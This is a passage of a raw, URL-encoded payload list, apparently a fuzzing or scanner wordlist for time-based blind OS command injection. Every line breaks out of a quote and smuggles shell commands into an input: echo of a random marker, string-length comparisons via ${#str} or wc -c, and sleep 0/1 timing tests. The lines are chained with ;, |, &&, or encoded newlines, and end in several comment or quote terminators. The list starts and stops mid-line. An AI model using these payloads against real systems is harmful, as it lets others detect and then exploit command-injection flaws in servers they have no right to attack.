20sleep%201%3B%20fi%20%2527\n%2527%3B%20str%3D%24%28echo%20OOYLLH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%2527%3B%20str%3D%24%28echo%20OOYLLH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%2527%3B%20str%3D%24%28echo%20OOYLLH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%2527%3B%20str%3D%24%28echo%20OOYLLH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%2527%3B%20str%3D%24%28echo%20OOYLLH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%2527%3B%20str%3D%24%28echo%20OOYLLH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%2527%3B%20str%3D%24%28echo%20OOYLLH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%2527%7C%20%5B%201%20-ne%20%24%28echo%20LVDDNF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2527%7C%20%5B%202%20-ne%20%24%28echo%20LVDDNF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2527%7C%20%5B%203%20-ne%20%24%28echo%20LVDDNF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2527%7C%20%5B%204%20-ne%20%24%28echo%20LVDDNF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2527%7C%20%5B%205%20-ne%20%24%28echo%20LVDDNF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2527%7C%20%5B%206%20-ne%20%24%28echo%20LVDDNF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2527%7C%20%5B%207%20-ne%20%24%28echo%20LVDDNF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2527%7C%20%5B%208%20-ne%20%24%28echo%20LVDDNF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2527%7C%20%5B%209%20-ne%20%24%28echo%20LVDDNF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KMQXRC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KMQXRC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KMQXRC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KMQXRC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KMQXRC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KMQXRC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KMQXRC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KMQXRC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KMQXRC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%2527%0A%20str%3D%24%28echo%20JKJFEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2527%0A%20str%3D%24%28echo%20JKJFEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2527%0A%20str%3D%24%28echo%20JKJFEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2527%0A%20str%3D%24%28echo%20JKJFEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2527%0A%20str%3D%24%28echo%20JKJFEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2527%0A%20str%3D%24%28echo%20JKJFEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2527%0A%20str%3D%24%28echo%20JKJFEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2527%0A%20str%3D%24%28echo%20JKJFEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2527%0A%20str%3D%24%28echo%20JKJFEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%2527%3B%20str%3D%24%28echo%20UEOOZQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2527%3B%20str%3D%24%28echo%20UEOOZQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2527%3B%20str%3D%24%28echo%20UEOOZQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2527%3B%20str%3D%24%28echo%20UEOOZQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2527%3B%20str%3D%24%28echo%20UEOOZQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2527%3B%20str%3D%24%28echo%20UEOOZQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2527%3B%20str%3D%24%28echo%20UEOOZQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2527%3B%20str%3D%24%28echo%20UEOOZQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2527%3B%20str%3D%24%28echo%20UEOOZQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%2527%7C%20%5B%201%20-ne%20%24%28echo%20JVVWQM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2527%7C%20%5B%202%20-ne%20%24%28echo%20JVVWQM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2527%7C%20%5B%203%20-ne%20%24%28echo%20JVVWQM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2527%7C%20%5B%204%20-ne%20%24%28echo%20JVVWQM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2527%7C%20%5B%205%20-ne%20%24%28echo%20JVVWQM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2527%7C%20%5B%206%20-ne%20%24%28echo%20JVVWQM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2527%7C%20%5B%207%20-ne%20%24%28echo%20JVVWQM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2527%7C%20%5B%208%20-ne%20%24%28echo%20JVVWQM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2527%7C%20%5B%209%20-ne%20%24%28echo%20JVVWQM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XGXYKB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XGXYKB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XGXYKB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XGXYKB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XGXYKB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XGXYKB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XGXYKB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XGXYKB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XGXYKB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%2527%0A%20str%3D%24%28echo%20GGPYAR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2527%0A%20str%3D%24%28echo%20GGPYAR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2527%0A%20str%3D%24%28echo%20GGPYAR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2527%0A%20str%3D%24%28echo%20GGPYAR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2527%0A%20str%3D%24%28echo%20GGPYAR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2527%0A%20str%3D%24%28echo%20GGPYAR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2527%0A%20str%3D%24%28echo%20GGPYAR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2527%0A%20str%3D%24%28echo%20GGPYAR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2527%0A%20str%3D%24%28echo%20GGPYAR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%2527%3B%20str%3D%24%28echo%20TABIFB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2527%3B%20str%3D%24%28echo%20TABIFB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2527%3B%20str%3D%24%28echo%20TABIFB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2527%3B%20str%3D%24%28echo%20TABIFB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2527%3B%20str%3D%24%28echo%20TABIFB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2527%3B%20str%3D%24%28echo%20TABIFB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2527%3B%20str%3D%24%28echo%20TABIFB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2527%3B%20str%3D%24%28echo%20TABIFB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2527%3B%20str%3D%24%28echo%20TABIFB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%2527%7C%20%5B%201%20-ne%20%24%28echo%20RHGVTL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2527%7C%20%5B%202%20-ne%20%24%28echo%20RHGVTL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2527%7C%20%5B%203%20-ne%20%24%28echo%20RHGVTL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2527%7C%20%5B%204%20-ne%20%24%28echo%20RHGVTL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2527%7C%20%5B%205%20-ne%20%24%28echo%20RHGVTL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2527%7C%20%5B%206%20-ne%20%24%28echo%20RHGVTL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2527%7C%20%5B%207%20-ne%20%24%28echo%20RHGVTL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2527%7C%20%5B%208%20-ne%20%24%28echo%20RHGVTL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2527%7C%20%5B%209%20-ne%20%24%28echo%20RHGVTL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IUGZRA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IUGZRA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IUGZRA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IUGZRA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IUGZRA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IUGZRA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IUGZRA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IUGZRA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IUGZRA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%2527%0A%20str%3D%24%28echo%20KARBCX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2527%0A%20str%3D%24%28echo%20KARBCX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2527%0A%20str%3D%24%28echo%20KARBCX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2527%0A%20str%3D%24%28echo%20KARBCX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2527%0A%20str%3D%24%28echo%20KARBCX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2527%0A%20str%3D%24%28echo%20KARBCX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2527%0A%20str%3D%24%28echo%20KARBCX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2527%0A%20str%3D%24%28echo%20KARBCX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2527%0A%20str%3D%24%28echo%20KARBCX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%2527%3B%20str%3D%24%28echo%20DJSHTX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2527%3B%20str%3D%24%28echo%20DJSHTX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2527%3B%20str%3D%24%28echo%20DJSHTX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2527%3B%20str%3D%24%28echo%20DJSHTX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2527%3B%20str%3D%24%28echo%20DJSHTX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2527%3B%20str%3D%24%28echo%20DJSHTX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2527%3B%20str%3D%24%28echo%20DJSHTX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2527%3B%20str%3D%24%28echo%20DJSHTX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2527%3B%20str%3D%24%28echo%20DJSHTX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%2527%7C%20%5B%201%20-ne%20%24%28echo%20OYYPMX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2527%7C%20%5B%202%20-ne%20%24%28echo%20OYYPMX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2527%7C%20%5B%203%20-ne%20%24%28echo%20OYYPMX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2527%7C%20%5B%204%20-ne%20%24%28echo%20OYYPMX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2527%7C%20%5B%205%20-ne%20%24%28echo%20OYYPMX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2527%7C%20%5B%206%20-ne%20%24%28echo%20OYYPMX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2527%7C%20%5B%207%20-ne%20%24%28echo%20OYYPMX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2527%7C%20%5B%208%20-ne%20%24%28echo%20OYYPMX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2527%7C%20%5B%209%20-ne%20%24%28echo%20OYYPMX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AUSQYM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AUSQYM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%2527%26%20sleep%200%20%26%26%20str%3D%2